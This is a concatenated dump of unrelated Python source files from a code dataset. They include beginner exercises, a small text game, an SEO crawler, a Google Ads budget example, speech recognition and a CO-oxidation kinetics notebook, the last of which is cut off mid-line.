'runcmd = runcommands.__main__:main',\n 'runcommand = runcommands.__main__:main',\n 'runcommands = runcommands.__main__:main',\n 'runcommands-complete = runcommands.completion:complete.console_script',\n ],\n },\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Software Development :: Build Tools',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291417784","text":"# Number Pattern 2\n\n'''\nPrint the following pattern for the given N number of rows.\n\nPattern for N = 4\n1\n11\n202\n3003\n\n\nInput format :\nInteger N (Total no. 
of rows)\n\nOutput format :\nPattern in N lines\n\n\nSample Input :\n5\n\nSample Output :\n1\n11\n202\n3003\n40004\n'''\n\n# CODE #\n\n'''\nn = int(input())\ni = 1\n\nif n > 0:\n while i <= n:\n j = 1\n p = i\n while j <= i:\n\n if i == p and j == 1:\n if i == 1 and j ==1:\n print(1, end='')\n else:\n print(i - 1, end='')\n elif j == i:\n print(i - 1, end='')\n else:\n print(0, end='')\n j += 1\n print()\n i += 1\nelse:\n print(1)\n'''\n\n### OR ###\n\n\nn = int(input())\nprint(1)\ni = 1\nwhile i < n:\n j = 0\n while j < i+1:\n if j==0 or j==i:\n print(i,end='')\n else:\n print(0,end=\"\")\n j = j + 1\n print()\n i = i + 1\n","sub_path":"Patterns/Number Pattern 2.py","file_name":"Number Pattern 2.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"438624586","text":"\"\"\"Given a number output the Fibonacci Sequence\"\"\"\n\n\nglobal user_input\n\ncounter = 0\ndef fibinacci(num1, num2, counter):\n counter += 1\n if (num1 > num2):\n return 1\n\n if counter > int(user_input):\n return (\"Finished\")\n\n print(num1)\n\n return fibinacci(num2, num1+num2, counter)\n\ntry:\n user_input = input(\"Please enter a number from 1-100: \")\nexcept TypeError:\n print(\"This is a type error; make sure you type an integer\")\n\n\n\nnum1 = 0\nnum2 = 1\n\nfibinacci(num1, num2, counter)\n","sub_path":"Practice_Problems/Fibinacci_Seq.py","file_name":"Fibinacci_Seq.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"257001535","text":"import sys, random\r\n\r\n\r\nclass Person():\r\n\r\n def __init__(self, name, health = 100, friendly = 0.5, location = \"Cafeteria\", sex = \"M\"):\r\n self.name = name\r\n self.health = health\r\n self.friendly = friendly\r\n self.location = location\r\n self.sex = sex\r\n\r\n\r\ndef main():\r\n names = [\"John\", \"Missy\", \"irrelevant\", \"George\", \"Georg\", \"Jourge\", \"Jeorge\"]\r\n doing = \"\"\r\n lastInteractChr = None\r\n\r\n chrList = [Person(\"John\", 100, 0.8, \"Hallway\", \"M\"),\r\n Person(\"Missy\", 90, 0.4, \"Classroom1\", \"F\"),\r\n Person(\"George\", 100, 0.5, \"Cafeteria\", \"M\")]\r\n\r\n nameIndex = random.randrange(0, len(chrList)) # randrange excludes the stop value, so use len(chrList) to allow every character to be picked\r\n\r\n\r\n print(\"You have just entered your school\")\r\n\r\n while True:\r\n # Reactions\r\n print(\"\\n\")\r\n\r\n if doing == \"fight\":\r\n if action == \"punch\":\r\n if lastInteractChr.sex == \"M\":\r\n print(\"You suddenly realize that he is straight up dead.\")\r\n lastInteractChr.health = 0\r\n doing = None\r\n\r\n action = input(\"What do you want to do?\\n\")\r\n\r\n if doing == \"fight\":\r\n if action == \"punch\":\r\n if lastInteractChr.sex == \"F\":\r\n print(\"You viscerally beat the poor girl in the face.\\n\" +\r\n \"Those around you stare in disgust. You can feel their anger in your chest.\")\r\n else:\r\n print(\"lol\\n\" +\r\n \"His face satisfyingly wobbles. You feel like a monster. You smile.\")\r\n elif action == \"stop\":\r\n print(\"You tear off your white wifebeater, tear a structural 2x4 out of the wall next to you,\\n\" +\r\n \"and use the two to construct a white flag. They appear to accept.\")\r\n doing = None\r\n elif action == \"?\":\r\n print(\"You may: \\n fight \\n run \\n go to class\")\r\n elif action == \"fight\":\r\n print(\"You turn to the nearest individual and raise your hand. 
Their name is {}.\".format(chrList[nameIndex].name))\r\n lastInteractChr = chrList[nameIndex]\r\n elif action == \"run\":\r\n print(\"You break into a sprint. The wind is in your face, upsetting your glorious mullet.\")\r\n else:\r\n print(\"You stand stoically still, as if a statue chiseled from an eternal hill.\")\r\n\r\n if action == \"fight\":\r\n doing = \"fight\"\r\n\r\n\r\nmain()\r\n","sub_path":"messin.py","file_name":"messin.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"78340689","text":"N = [int(x) for x in input().split()]\ndays = 0\nfor i in range(1,N[0]):\n if i==1 or i==3 or i==5 or i==7 or i==8 or i==10 or i==12:\n days += 31\n elif i==2:\n days += 28\n else:\n days += 30\n\ndays += N[1]\ndays %= 7\n\nif days==0:\n print('SUN')\nif days==1:\n print('MON')\nif days==2:\n print('TUE')\nif days==3:\n print('WED')\nif days==4:\n print('THU')\nif days==5:\n print('FRI')\nif days==6:\n print('SAT')\n","sub_path":"Backjoon/HTJ/for문 사용해보기/1924 2007년.py","file_name":"1924 2007년.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"216845631","text":"# Working with Lists in Python\r\n\r\nmyUniqueList=[]\r\nmyLeftovers=[]\r\n\r\ndef search(x,index): # Function to check for duplicates\r\n \r\n for i in range(index):\r\n\r\n if x==myUniqueList[i]:\r\n return True # Returns True if a duplicate is found\r\n\r\n\r\ndef AddToList(x,index):\r\n \r\n a=search(x,index)\t\r\n\r\n if a==True:\r\n myLeftovers.append(x) # Duplicate elements added to myLeftovers\r\n return False\r\n\r\n else:\r\n myUniqueList.append(x) # Unique elements added to myUniqueList\r\n return True\r\n\r\n\r\nAddToList(1,0) \r\nAddToList(2,1)\r\nAddToList(3,2)\r\nAddToList(5,3)\r\nAddToList(1,4)\r\nAddToList(2,5)\r\nAddToList(3,6)\r\n\r\nprint(myUniqueList)\r\nprint(myLeftovers)\r\n","sub_path":"py_assign4.py","file_name":"py_assign4.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"178292174","text":"f = open('请英文格式下导入条码.txt')\nlines = len(f.readlines())\nf.seek(0)\n\nDATE = []\nSPMC = []\nCPGG = []\nGG2 = []\nCS = []\nTM = []\n\nl1 = f.readlines()\n\na = 0\nb = len(l1)\nwhile a < b:\n l = l1[a].split('/')\n\n day = l[0][2:]\n ph = l[1]\n kj = l[2]\n dj = l[3]\n\n DATE.append(day)\n\n if dj == 'A':\n spmc = '一等品' + kj + '口径'\n elif dj == 'B':\n spmc = '二等品' + kj + '口径'\n else:\n spmc = '三等品' + kj + '口径'\n SPMC.append(spmc)\n\n m = len(l)\n if m == 6:\n dh = l[5][:12]\n gg2 = l[4]\n tm = day + '/' + ph + '/' + kj + '/' + dj + '/' + gg2 + '/' + dh\n GG2.append(gg2)\n TM.append(tm)\n CS.append(dh)\n \n if dj == 'A' and dh == '0772-6511119':\n dj1 = 'A'\n elif dj == 'A' and dh == '0772-6511099':\n dj1 = 'A1'\n elif dj == 'A' and dh == '0772-6511077':\n dj1 = 'A2'\n else:\n dj1 = dj\n cpgg = ph + dj1 \n CPGG.append(cpgg)\n elif m == 5:\n dh = '0'\n gg2 = l[4][:4]\n GG2.append(gg2)\n CS.append(dh)\n tm = day + '/' + ph + '/' + kj + '/' + dj + '/' + gg2\n TM.append(tm)\n cpgg = ph + dj\n CPGG.append(cpgg)\n \n a += 1\n \nfrom openpyxl import Workbook\nwb = Workbook()\nws = wb.active\nws1 = wb.create_sheet(\"Sheet1\", 0)\n\nws1['A1'] = '商品编号'\nws1['B1'] = '商品名称'\nws1['C1'] = '单位'\nws1['D1'] = '产品规格'\nws1['E1'] = '规格2'\nws1['F1'] = '保质期'\nws1['G1'] = '商品条码'\nws1['H1'] = '最低库存'\nws1['I1'] = '预设进价'\nws1['J1'] = '预设售价'\nws1['K1'] = 
'一级价格'\nws1['L1'] = '二级价格'\nws1['M1'] = '三级价格'\nws1['N1'] = '四级价格'\nws1['O1'] = '五级价格'\nws1['P1'] = '生产厂商'\nws1['Q1'] = '备注'\n\nv = 0\n\nwhile v < lines:\n\th = v + 2\n\tws1.cell(row = h , column = 2).value = SPMC[v]\n\tws1.cell(row = h , column = 3).value = '件'\n\tws1.cell(row = h , column = 4).value = CPGG[v]\n\tws1.cell(row = h , column = 5).value = GG2[v]\n\tws1.cell(row = h , column = 6).value = 720\n\tws1.cell(row = h , column = 7).value = TM[v]\n\tws1.cell(row = h , column = 16).value = CS[v]\n\tws1.cell(row = h , column = 17).value = DATE[v]\n\t\n\tv += 1\n\nf.close()\nwb.save('商品信息.xlsx') ","sub_path":"条码分析软件1.2.py","file_name":"条码分析软件1.2.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34101707","text":"class Solution:\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n ans = []\n candidates.sort()\n if len(candidates) == 0 or candidates[0] > target:\n return ans\n\n i = 0\n can_len = len(candidates)\n while i < can_len:\n if candidates[i] == target:\n ans.append([candidates[i]])\n break\n elif candidates[i] > target:\n break\n i += 1\n\n if i == 0:\n return ans\n\n for j in range(i):\n b = candidates[j + 1:i]\n if j > 0 and candidates[j] == candidates[j - 1]:\n continue\n l = self.combinationSum2(b, target - candidates[j])\n for each_ans in l:\n each_ans.append(candidates[j])\n ans.append(each_ans)\n return ans","sub_path":"40. Combination Sum II/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"370935848","text":"# -*- coding: utf-8 -*-\n\nfrom fabric.api import run, cd, env, local\n\nenv.hosts = ['python@androidgreetings.ru']\nproject_path = '/home/python/androidgreetings'\n\n\ndef push_deploy():\n local('git push')\n deploy()\n\n\ndef deploy():\t\n\twith cd(project_path):\n\t\trun('git pull')\n\t\trun('sudo supervisorctl restart androidgreetings')\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568575101","text":"def isbn10to13(isbn10) :\n \"\"\"Converts an isbn10 numeric code to an isbn13 numeric code.\n Takes a string as the initial parameter and returns a string\"\"\"\n sums = 0\n for i in range(0, 9, 2) :\n sums = sums + 3 * int(isbn10[i])\n for i in range(1, 9, 2) :\n sums = sums + int(isbn10[i])\n print(sums)\n sums = sums + 9 * 1 + 7 * 3 + 8 * 1\n print(\"978\" + isbn10[:9] + str(sums % 10))\n return (\"978\" + isbn10[:9] + str((10 - sums) % 10))\n","sub_path":"2nd Year/SC272/stest2/isbn.py","file_name":"isbn.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"178973713","text":"from config import *\nfrom math import sqrt\n\nimport math\n\n\nclass Player:\n def __init__(self, game):\n self.pos = [150, 400]\n self.xDirection = 0 # tendency\n self.yDirection = 0\n self.facing_right = True\n self.game = game\n self.h = 191\n self.w = 100\n\n self.walk_cycle = Cycle(11, 0)\n\n\n def draw(self):\n pos = (self.pos[0] - (ENV[\"mouse_x\"] - SCREEN_WIDTH / 2) * (100 / self.pos[1]) ** 2,\n self.pos[1] - self.h - (ENV[\"mouse_y\"] - SCREEN_HEIGHT / 2) * (100 / self.pos[1]) ** 2)\n pygame.draw.ellipse(screen, (150, 
150, 150), (pos[0], pos[1] + self.h - 20, self.w, 20))\n texture = \"me\"\n if not self.facing_right:\n texture = \"me_left\"\n if self.yDirection or self.xDirection:\n screen.blit(texture_lib[texture], (pos[0], pos[1]-h_s[self.walk_cycle.get()]))\n if self.walk_cycle.changed() and self.walk_cycle.current == 0:\n sn_walk.play_once()\n else:\n screen.blit(texture_lib[texture], pos)\n if self.walk_cycle.tick != 0 or self.walk_cycle.current != 0:\n self.walk_cycle.reset()\n\n def handle_event(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a:\n self.xDirection -= 1\n elif event.key == pygame.K_d:\n self.xDirection += 1\n elif event.key == pygame.K_w:\n self.yDirection -= 1\n elif event.key == pygame.K_s:\n self.yDirection += 1\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_a:\n self.xDirection += 1\n elif event.key == pygame.K_d:\n self.xDirection -= 1\n elif event.key == pygame.K_w:\n self.yDirection += 1\n elif event.key == pygame.K_s:\n self.yDirection -= 1\n elif event.key == pygame.K_k:\n if ENV[\"item_interact\"]:\n item = ENV[\"item_interact\"]\n flag = True\n if item.item_id == 1:\n self.game.start_chat_scene(\"door\", next_map=True)\n elif item.item_id == 2:\n self.game.start_chat_scene(\"mom\", next_map=True)\n elif item.item_id == 3:\n self.game.start_chat_scene(\"mystery\", next_map=True)\n elif item.item_id == 4:\n self.game.start_chat_scene(\"box\", next_map=True)\n elif item.item_id == 5:\n self.game.start_chat_scene(\"medicine\")\n self.game.current_map.remove_item(5)\n self.game.inventory.add_item(\"medicine\")\n elif item.item_id == 6:\n if self.game.inventory.has_item(\"medicine\"):\n self.game.start_chat_scene(\"table2\", next_map=True)\n else:\n self.game.start_chat_scene(\"table1\")\n elif item.item_id == 7:\n self.game.start_chat_scene(\"shovel\")\n self.game.current_map.remove_item(7)\n self.game.inventory.add_item(\"shovel\")\n elif item.item_id == 8:\n if self.game.inventory.has_item(\"shovel\"):\n self.game.start_chat_scene(\"hole2\", next_map=True)\n else:\n self.game.start_chat_scene(\"hole1\")\n elif item.item_id == 9:\n self.game.start_chat_scene(\"injector\")\n self.game.current_map.remove_item(9)\n self.game.inventory.add_item(\"injector\")\n elif item.item_id == 10:\n if self.game.inventory.has_item(\"injector\"):\n self.game.start_chat_scene(\"cream2\", next_map=True)\n else:\n self.game.start_chat_scene(\"cream1\")\n elif item.item_id == 11:\n self.game.start_chat_scene(\"q12\", next_map=True)\n elif item.item_id == 12:\n self.game.start_chat_scene(\"q22\", next_map=True)\n elif item.item_id == 13:\n self.game.start_chat_scene(\"q32\", next_map=True)\n else:\n flag = False\n if flag:\n sn_interact.play_once()\n\n def move(self, dx, dy):\n self.pos[0] += dx\n if dx > 0:\n self.facing_right = True\n elif dx < 0:\n self.facing_right = False\n self.pos[1] += dy\n if self.pos[0] < 0:\n self.pos[0] = 0\n if self.pos[0] > 720:\n self.pos[0] = 720\n if self.pos[1] < 270:\n self.pos[1] = 270\n if self.pos[1] > 500:\n self.pos[1] = 500\n\n def update(self):\n\n if self.xDirection != 0 or self.yDirection != 0:\n speed = 6\n if self.xDirection != 0 and self.yDirection != 0:\n speed = 6/sqrt(2)\n self.move(speed * self.xDirection, speed * self.yDirection)\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"277087914","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport 
requests\nfrom bs4 import BeautifulSoup\nimport logging\nimport MySQLdb\nimport datetime,time\nimport random\n\ndef getHtml(url):\n\tuser_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'\n\theaders = {\n\t\t'User-Agent' : user_agent,\n\t\t'Referer':'http://www.google.com/'\n\t\t}\n\thtml = requests.get(url,headers=headers)\n\treturn html\ndef getSoup(html):\n\tsoup = BeautifulSoup(str(html.content), \"html.parser\")\n\treturn soup\ndef getTitle(soup):\n\ttry:\n\t\ttitle = soup.title.string\n\t\treturn title\n\texcept:\n\t\treturn ''\ndef getDescription(soup):\n\ttry:\n\t\tdescription = soup.find(attrs={\"name\":\"description\"})['content'] \n\t\treturn description\n\texcept:\n\t\treturn ''\ndef getKeywords(soup):\n\ttry:\n\t\tkeywords = soup.find(attrs={\"name\":\"keywords\"})['content'] \n\t\treturn keywords\n\texcept:\n\t\treturn ''\ndef getCanonical(soup):\n\ttry:\n\t\tcanonical = soup.find(attrs={\"rel\":\"canonical\"})['href']\n\t\treturn canonical\n\texcept:\n\t\treturn ''\ndef getH1(soup):\n\ttry:\n\t\th1 = soup.find('h1').get_text()\n\t\treturn h1\n\texcept:\n\t\treturn ''\ndef getOutlinks(soup):\n\ttry:\n\t\thref = soup.find_all(\"a\",href=True)\n\t\ti = 0\n\t\tfor x in href:\n\t\t\tif x.get(\"href\") != \"\":\n\t\t\t\ti = i+1\n\t\treturn i\n\texcept:\n\t\treturn ''\ndef getHrefs(soup):\n\ttry:\n\t\threfs = soup.find_all(\"a\",href=True)\n\t\treturn hrefs\n\texcept:\n\t\treturn ''\ndef main():\n\t#SQLs\n\tsqlselect = \"SELECT * FROM pages\"\n\tsqlupdate = \"UPDATE pages set check_at = %s where id = %s\"\n\tsqlinsert = \"INSERT INTO checkinfos (page_id,title,description,keywords,canonical,h1,status,outlinks,created_at,updated_at) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\tsqlhrefinsert = \"INSERT INTO outlinks (page_id,href,rel,created_at,updated_at) values (%s,%s,%s,%s,%s)\"\n\t#Open SQL\n\tconn = MySQLdb.connect(\n host = 'localhost',\n port = 3306,\n user = 'root',\n passwd = 'root',\n db = 'checkseo',\n charset = 'utf8',\n )\n\tcursor = conn.cursor()\n\t#Select Pages\n\tcursor.execute(sqlselect)\n\tpages = cursor.fetchall()\n\tfor page in pages:\n\t\turl = page[3]\n\t\thtml = getHtml(url)\n\t\tsoup = getSoup(html)\n\t\ttitle = getTitle(soup)\n\t\tdescription = getDescription(soup)\n\t\tkeywords = getKeywords(soup)\n\t\tcanonical = getCanonical(soup)\n\t\th1 = getH1(soup)\n\t\tstatus = html.status_code\n\t\toutlinks = getOutlinks(soup)\n\t\tnow = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t#Insert Outlinks\n\t\threfs = getHrefs(soup)\n\t\tfor href in hrefs:\n\t\t\tif href.get(\"rel\") == None:\n\t\t\t\trel = \"follow\"\n\t\t\telse:\n\t\t\t\trel = \"nofollow\"\n\t\t\tif href.get(\"href\") != \"\":\n\t\t\t\tcursor.execute(sqlhrefinsert,(page[0],href.get(\"href\"),rel,now,now))\n\t\t#Update Pages\n\t\tcursor.execute(sqlupdate,(now,page[0]))\n\t\t#Insert Checkinfos\n\t\tcursor.execute(sqlinsert,(page[0], title, description, keywords, canonical, h1, status, outlinks,now,now))\n\t\t#Commit\n\t\tconn.commit()\n\tcursor.close()\n\tconn.close()\n\nif __name__ == '__main__':\n\twhile 1:\n\t\t#Log\n\t\tlogging.basicConfig(level = logging.DEBUG,\n\t\t\t\t\t\t\tformat = '%(process)d %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n\t\t\t\t\t\t\tdatefmt = '%a, %d %b %Y %H:%M:%S',\n\t\t\t\t\t\t\tfilename = 'CheckSEO.log',\n\t\t\t\t\t\t\tfilemode = 'w')\n\t\t#Start\n\t\tlogging.info(\"Today Start %s\" % time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\t#Main\n\t\tmain()\n\t\t#Sleep Till Tomorrow\n\t\tt = 
(datetime.datetime.strptime((str(datetime.date.today()+datetime.timedelta(1))+\" 00:00:00\"),'%Y-%m-%d %H:%M:%S')-datetime.datetime.now()).seconds+int(random.uniform(600, 6000))\n\t\tlogging.info(\"Today End! Start Sleep %ss (Sleep Till Tomorrow)\" % t)\n\t\ttime.sleep(t)","sub_path":"Python/CheckSEO.py","file_name":"CheckSEO.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"545597469","text":"#import speech_recognition as sr\r\n#r = sr.Recognizer()\r\n#with sr.WavFile(\"audiotrump.wav\") as source: # use \"test.wav\" as the audio source\r\n # audio = r.record(source) # extract audio data from the file\r\n\r\n#try:\r\n # print(\"Transcription: \" + r.recognize_sphinx(audio)) # recognize speech using Google Speech Recognition\r\n#except LookupError: # speech is unintelligible\r\n # print(\"Could not understand audio\")\r\n\r\n\r\n#!/usr/bin/env python3\r\n\r\nimport speech_recognition as sr\r\n\r\n# obtain path to \"english.wav\" in the same folder as this script\r\nfrom os import path\r\nAUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), \"Short_clip3.wav\")\r\n# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), \"french.aiff\")\r\n# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), \"chinese.flac\")\r\n\r\n# use the audio file as the audio source\r\nr = sr.Recognizer()\r\nwith sr.AudioFile(AUDIO_FILE) as source:\r\n audio = r.record(source) # read the entire audio file\r\n\r\n# recognize speech using Sphinx\r\ntry:\r\n print(\"Sphinx thinks you said \" + r.recognize_sphinx(audio))\r\nexcept sr.UnknownValueError:\r\n print(\"Sphinx could not understand audio\")\r\nexcept sr.RequestError as e:\r\n print(\"Sphinx error; {0}\".format(e))\r\n","sub_path":"sphinx.py","file_name":"sphinx.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"454545149","text":"#!/usr/bin/env python\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"This illustrates how to get all account budgets for a Google Ads customer.\"\"\"\n\n\nimport argparse\nimport sys\n\nfrom google.ads.googleads.client import GoogleAdsClient\nfrom google.ads.googleads.errors import GoogleAdsException\n\n\ndef main(client, customer_id):\n ga_service = client.get_service(\"GoogleAdsService\")\n\n query = \"\"\"\n SELECT\n account_budget.status,\n account_budget.billing_setup,\n account_budget.approved_spending_limit_micros,\n account_budget.approved_spending_limit_type,\n account_budget.proposed_spending_limit_micros,\n account_budget.proposed_spending_limit_type,\n account_budget.adjusted_spending_limit_micros,\n account_budget.adjusted_spending_limit_type,\n account_budget.approved_start_date_time,\n account_budget.proposed_start_date_time,\n account_budget.approved_end_date_time,\n account_budget.approved_end_time_type,\n account_budget.proposed_end_date_time,\n 
account_budget.proposed_end_time_type\n FROM account_budget\"\"\"\n\n stream = ga_service.search_stream(customer_id=customer_id, query=query)\n\n for batch in stream:\n for row in batch.results:\n budget = row.account_budget\n\n # Here and in the statements below, the variable is set to the\n # name of the Enum as a default if the numeric value for the\n # monetary or date fields is not present.\n approved_spending_limit = (\n micros_to_currency(budget.approved_spending_limit_micros)\n or budget.approved_spending_limit_type.name\n )\n\n proposed_spending_limit = (\n micros_to_currency(budget.proposed_spending_limit_micros)\n or budget.proposed_spending_limit_type.name\n )\n\n adjusted_spending_limit = (\n micros_to_currency(budget.adjusted_spending_limit_micros)\n or budget.adjusted_spending_limit_type.name\n )\n\n approved_end_date_time = (\n budget.approved_end_date_time\n or budget.approved_end_time_type.name\n )\n\n proposed_end_date_time = (\n budget.proposed_end_date_time\n or budget.proposed_end_time_type.name\n )\n\n amount_served = (\n micros_to_currency(budget.amount_served_micros) or 0.0\n )\n\n total_adjustments = (\n micros_to_currency(budget.total_adjustments_micros) or 0.0\n )\n\n print(\n f'Account budget \"{budget.resource_name}\", '\n f'with status \"{budget.status.name}\", '\n f'billing setup \"{budget.billing_setup}\", '\n f\"amount served {amount_served:.2f}, \"\n f\"total adjustments {total_adjustments:.2f}, \"\n f'approved spending limit \"{approved_spending_limit}\" '\n f'(proposed \"{proposed_spending_limit}\" -- '\n f'adjusted \"{adjusted_spending_limit}\"), approved '\n f'start time \"{budget.approved_start_date_time}\" '\n f'(proposed \"{budget.proposed_start_date_time}\"), '\n f'approved end time \"{approved_end_date_time}\" '\n f'(proposed \"{proposed_end_date_time}\").'\n )\n\n\ndef micros_to_currency(micros):\n return micros / 1000000.0 if micros is not None else None\n\n\nif __name__ == \"__main__\":\n # GoogleAdsClient will read the google-ads.yaml configuration file in the\n # home directory if none is specified.\n googleads_client = GoogleAdsClient.load_from_storage(version=\"v14\")\n\n parser = argparse.ArgumentParser(\n description=(\n \"Lists all account budgets for given Google Ads customer ID.\"\n )\n )\n # The following argument(s) should be provided to run the example.\n parser.add_argument(\n \"-c\",\n \"--customer_id\",\n type=str,\n required=True,\n help=\"The Google Ads customer ID.\",\n )\n args = parser.parse_args()\n\n try:\n main(googleads_client, args.customer_id)\n except GoogleAdsException as ex:\n print(\n f'Request with ID \"{ex.request_id}\" failed with status '\n f'\"{ex.error.code().name}\" and includes the following errors:'\n )\n for error in ex.failure.errors:\n print(f'\\tError with message \"{error.message}\".')\n if error.location:\n for field_path_element in error.location.field_path_elements:\n print(f\"\\t\\tOn field: {field_path_element.field_name}\")\n sys.exit(1)\n","sub_path":"examples/billing/get_account_budgets.py","file_name":"get_account_budgets.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"415997310","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Microkinetic Model for CO Oxidation (Pd), (PdO) and (PdO2) + O2 ads\n\n# Reactions - 1 - 8\n# \n# ![image.png](attachment:image.png)\n\n# Reactions 6' - 11\n# ![image.png](attachment:image.png)\n\n# Reactions 12-14\n# ![image.png](attachment:image.png)\n\n# 
Reactions 15-16 for O2 adsorption on Pd\n# \n# ![image.png](attachment:image.png)\n\n# First, we import the necessary numpy and scipy modules\n\n# In[1]:\n\n\nimport numpy as np\nimport math\nfrom scipy.integrate import odeint\nfrom sklearn.linear_model import LinearRegression\nmodel = LinearRegression()\n\n\n# We also need to define a set of reaction conditions\n\n# # Microkinetic Model\n\n# In[2]:\n\n\n# T = 480 # K\n# PCO = 0.02 # bar PCO is 2%\n# PO2 = 0.20 # bar PO2 is 20%\nPCO2 = 0 # bar\nR = 8.314\nmAr = 39.848\nmCO = 28.0101\nmO2 = 32\nmCO2 = 44\n\nSCOn = 197.660\nSO2n = 205.152\nSCO2n = 213.79\n\n\n# ... and a few physical constants and conversion factors\n\n# In[3]:\n\n\nJ2eV = 6.24150974E18 # eV/J\nNa = 6.0221415E23 # mol-1\nh = 6.626068E-34 * J2eV # in eV*s\nkb = 1.3806503E-23 * J2eV # in eV/K\n# kbT = kb * T # in eV\n\n\n# ## Rate constants\n\n# In[4]:\n\n\ndef get_rate_constants(T):\n kbT = kb * T # in eV\n # Gas phase entropies converted to eV/K\n SCOg = 197.66 * J2eV / Na # eV/K\n SO2g = 205.0 * J2eV / Na\n SCO2g = 213.74 * J2eV / Na\n \n # Surface entropies as per charlie campbell's paper\n# SCO2v = Sv = SO2v = SO = SCOO = 0\n SCO = (0.70*SCOn - 3.3*R)*J2eV/Na\n SCO2 = (0.70*SCO2n - 3.3*R)*J2eV/Na\n SO2 = (0.70*SO2n - 3.3*R)*J2eV/Na\n \n # Reaction energies\n dE = np.zeros(19) # array initialization\n dE[0] = -1.09 # CO adsorption (-1.09)\n dE[1] = -0.22 # 1st CO oxidation\n dE[2] = 0.52 # 1st CO2 desorption (0.52)\n dE[3] = -2.07 # O2 adsorption in a vacancy\n dE[4] = -1.29 # O2 dissociation in the vacancy\n dE[5] = -0.65 # 2nd CO adsorption (-0.65)\n dE[6] = -1.46 # 2nd CO oxidation\n dE[7] = -0.0057 # 2nd CO2 desorption\n dE[8] = -0.65 # rxn 6'- 2nd CO adsorption using lattice O\n dE[9] = 0.33 # rxn 7' - 2nd CO oxidation using lattice O (0.33)\n dE[10] = 0.58 # rxn 8' - 2nd CO2 desorption leading to (V+O)*\n dE[11] = -2.34 # rxn 9 - O2 adsorption at (v+O)*\n dE[12] = -0.97 # rxn 10 -O2 dissociation at (v+O)*\n dE[13] = -1.27 # rxn 11 - O migration from (V+O)* --> *\n dE[14] = -0.35 # rxn 12 - CO adsorption at 2O*\n dE[15] = -2.31 # rxn 13 - CO oxidation at 2O*\n dE[16] = 0.45 # rxn 14 - CO2 desorption from O*\n dE[17] = -0.0067 # rxn 15 - O2 adsorption on *\n dE[18] = -1.77 # rxn 16 - O2 dissociation on * to give 2O*\n\n\n\n # Entropy changes (Ignoring dependence on T)\n# dSS = 0.001\n dS = np.zeros(19) # array initialization\n dS[0] = SCO - SCOg # CO adsorption\n dS[1] = 0 # 1st CO oxidation\n dS[2] = SCO2g - SCO2 # 1st CO2 desorption\n dS[3] = SO2 - SO2g # O2 adsorption in a vacancy\n dS[4] = 0 # O2 dissociation in the vacancy\n dS[5] = SCO - SCOg # 2nd CO adsorption\n dS[6] = 0 # 2nd CO oxidation\n dS[7] = SCO2g - SCO2 # 2nd CO2 desorption\n dS[8] = SCO - SCOg # rxn 6'- 2nd CO 